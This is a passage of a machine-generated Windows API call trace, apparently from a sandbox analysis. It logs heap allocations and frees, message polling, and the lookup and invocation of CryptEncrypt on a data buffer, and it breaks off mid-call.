hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0151.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0151.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0151.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0151.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0151.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0151.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0151.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0151.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0151.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0151.559] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0151.559] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0151.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0151.560] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0151.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0151.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0151.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0151.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0151.560] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0151.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0151.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0151.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0151.560] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0151.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0151.560] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0151.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0151.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0151.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0151.560] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0151.560] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0151.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0151.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0151.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0151.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0151.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0151.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0151.561] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0151.561] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0151.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0151.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0151.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0151.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0151.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0151.561] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0151.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0151.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0151.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0151.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0151.561] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0151.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0151.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0151.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0151.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0151.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0151.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0151.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0151.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0151.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0151.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0151.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0151.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0151.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0151.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0151.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0151.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0151.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0151.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0151.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0151.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0151.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0151.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0151.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0151.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0151.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0151.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0151.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0151.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0151.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0151.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0151.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0151.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0151.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0151.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0151.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0151.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0151.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0151.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0151.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0151.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0151.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0151.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0151.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0151.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0151.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0151.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0151.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0151.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0151.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0151.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0151.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0151.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0151.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0151.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0151.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0151.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0151.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0151.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0151.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0151.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0151.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0151.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0151.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0151.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9904) returned 0x2f27230 [0151.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0151.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f27230 | out: hHeap=0x970000) returned 1 [0151.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0151.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0151.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0151.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0151.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0151.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0151.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0151.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0151.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0151.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0151.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0151.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0151.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0151.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0151.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0151.567] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0151.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0151.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0151.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0151.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0151.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0151.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0151.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0151.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0151.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0151.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0151.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0151.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0151.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0151.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0151.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0151.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0151.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0151.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0151.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0151.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0151.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0151.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0151.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0151.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0151.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0151.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0151.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0151.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0151.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0151.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0151.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0151.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0151.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0151.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0151.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0151.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0151.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0151.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0151.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0151.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0151.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0151.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0151.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0151.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0151.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0151.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0151.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0151.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0151.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0151.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0151.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0151.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0151.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0151.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0151.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0151.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0151.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0151.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0151.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0151.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0151.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0151.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0151.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0151.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0151.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0151.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0151.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0151.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0151.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0151.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0151.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0151.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0151.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0151.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0151.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0151.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0151.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50ad0 [0151.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ad0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0151.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0151.570] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0151.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0151.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0151.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54210 [0151.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0151.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0151.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0151.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0151.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0151.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0151.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0151.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0151.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0151.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0151.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0151.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0151.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0151.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0151.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0151.669] CryptEncrypt (in: hKey=0xa87350, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x9904, 